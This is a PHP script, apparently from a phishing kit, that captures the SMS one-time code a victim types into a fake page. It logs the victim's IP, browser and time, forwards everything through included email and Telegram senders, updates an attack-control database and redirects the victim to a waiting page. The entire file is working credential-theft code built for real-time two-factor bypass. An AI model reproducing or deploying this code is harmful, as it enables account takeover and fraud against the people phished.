<?php

session_start();

if(isset($_POST['otp_sms'])) 
{

include("system.php"); 
include("detect.php"); 

$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);				
$_SESSION['browser'] = $browserTy_Version =array_pop($browser); 	

$otp_sms = $_SESSION['otp_sms'] = $_POST['otp_sms'];



$Domin = $_SESSION['Domin'] = $_SERVER['HTTP_REFERER']; 
$rt = substr($Domin, 0, -16);
$rtt = ''.$rt.'/Select/Select.php' ;



$yagmai .= '
[🔓 SMS Code ] = '.$_SESSION['otp_sms'].'
       [+]━━━━【🌍 Select】━━━[+]
'.$rtt.'
       [+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';


include("sand_email.php"); 
include("TelegramAPi.php");

$url =  " ";
$db = new SQLite3('../Select/auto_system/Dbsattack');
$db->exec('BEGIN');
$db->query('UPDATE "visits" SET "user_id"="451345654", "url"="'.$url.'" WHERE "id"="1"');
$db->exec('COMMIT');

$Page .= ' 
  ';

$fPage = fopen("../Select/Show_system/Show_Page.txt", "w");
    fwrite($fPage, $Page);

  $Pages .= ' 
  ';

$fPages = fopen("../Select/Show_system/Show_PageCode.txt", "w");
    fwrite($fPages, $Pages);


  

$src="../Select/Waiting.php";
header("location:$src");

}

else {
$src="../Login.php";
header("location:$src");
}

?>